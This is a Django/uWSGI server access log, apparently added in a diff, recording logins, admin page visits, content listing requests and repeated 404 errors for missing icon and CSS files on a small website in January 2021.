+[pid: 11057|app: 0|req: 1445/1815] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:20 2021] POST /login/ => generated 82 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1446/1816] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:48:30 2021] GET /kind-manage/? => generated 9252 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1447/1817] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:48:30 2021] POST /kind-manage/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1448/1818] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1449/1819] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1450/1820] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:48:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1451/1821] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1452/1822] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1453/1823] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 50 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1454/1824] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1455/1825] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1456/1826] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:48:30 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1457/1827] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:31 2021] POST /login/ => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1458/1828] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:48:32 2021] GET /kind-manage/ => generated 10194 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1459/1829] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1460/1830] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1461/1831] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1462/1832] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1463/1833] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1464/1834] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1465/1835] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1466/1836] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:48:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1467/1837] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:48:32 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1468/1838] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:34 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1469/1839] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 10:48:34 2021] GET /home/ => generated 8342 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1470/1840] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:48:39 2021] GET /ownpublish-0-0-0 => generated 8826 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1841] 219.228.146.135 () {38 vars in 816 bytes} [Thu Jan 14 10:48:39 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1842] 219.228.146.135 () {38 vars in 815 bytes} [Thu Jan 14 10:48:39 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1471/1843] 219.228.146.135 () {40 vars in 944 bytes} [Thu Jan 14 10:48:41 2021] GET /ownpublish-0-0-0 => generated 8826 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1472/1844] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 10:48:43 2021] GET /home/ => generated 8342 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1473/1845] 219.228.146.135 () {40 vars in 919 bytes} [Thu Jan 14 10:49:07 2021] GET /all-0-0-0 => generated 8615 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1474/1846] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:49:08 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1475/1847] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:49:08 2021] GET /kind-manage/? => generated 11136 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1476/1848] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:49:08 2021] GET /kind-manage/ => generated 11136 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1477/1849] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1478/1850] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1479/1851] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1480/1852] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1481/1853] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1482/1854] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1483/1855] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:49:09 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1484/1856] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:49:09 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1485/1857] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:49:09 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1858] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 10:49:10 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1486/1859] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:49:18 2021] GET /kind-manage/? => generated 11136 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1487/1860] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:49:18 2021] POST /kind-manage/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1488/1861] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1489/1862] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1490/1863] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1491/1864] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1492/1865] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1493/1866] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:49:18 2021] GET /static/css/spinners.css => generated 3516 bytes in 31 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1494/1867] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1495/1868] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1496/1869] 180.160.49.168 () {38 vars in 768 bytes} [Thu Jan 14 10:49:18 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1498/1870] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:49:26 2021] GET /kind-manage/? => generated 12084 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1498/1871] 180.160.49.168 () {48 vars in 978 bytes} [Thu Jan 14 10:49:26 2021] POST /kind-manage/? => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1500/1873] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1501/1874] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1502/1874] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1502/1875] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1503/1876] 180.160.49.168 () {38 vars in 769 bytes} [Thu Jan 14 10:49:26 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1504/1877] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1505/1878] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1506/1879] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1507/1880] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 10:49:26 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 11057|app: 0|req: 1508/1881] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 10:49:42 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1509/1882] 180.160.49.168 () {40 vars in 897 bytes} [Thu Jan 14 10:49:54 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1510/1883] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1511/1884] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1512/1885] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1513/1886] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1514/1887] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1515/1888] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1516/1889] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:49:54 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1517/1890] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1518/1891] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:49:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1519/1892] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 10:51:01 2021] GET /all-0-0-0 => generated 9071 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1520/1893] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:42 2021] GET /all-0-0-0 => generated 9071 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 1521/1894] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:44 2021] GET /all-3-0-0 => generated 9071 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[]
+[pid: 11057|app: 0|req: 1522/1895] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:45 2021] GET /all-4-0-0 => generated 9071 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 1523/1896] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:47 2021] GET /all-5-0-0 => generated 9071 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[]
+[pid: 11057|app: 0|req: 1524/1897] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:48 2021] GET /all-6-0-0 => generated 9071 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 1525/1898] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:49 2021] GET /all-7-0-0 => generated 9071 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[]
+[pid: 11057|app: 0|req: 1526/1899] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:50 2021] GET /all-8-0-0 => generated 9071 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 1527/1900] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:51:51 2021] GET /all-9-0-0 => generated 9071 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1528/1901] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 10:51:57 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1529/1902] 219.228.146.135 () {40 vars in 921 bytes} [Thu Jan 14 10:51:59 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1530/1903] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 10:52:02 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1531/1904] 219.228.146.135 () {40 vars in 928 bytes} [Thu Jan 14 10:52:02 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1532/1905] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:52:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1533/1906] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:52:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1534/1907] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:52:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1535/1908] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:52:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1536/1909] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:52:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1537/1910] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:52:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1538/1911] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:52:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
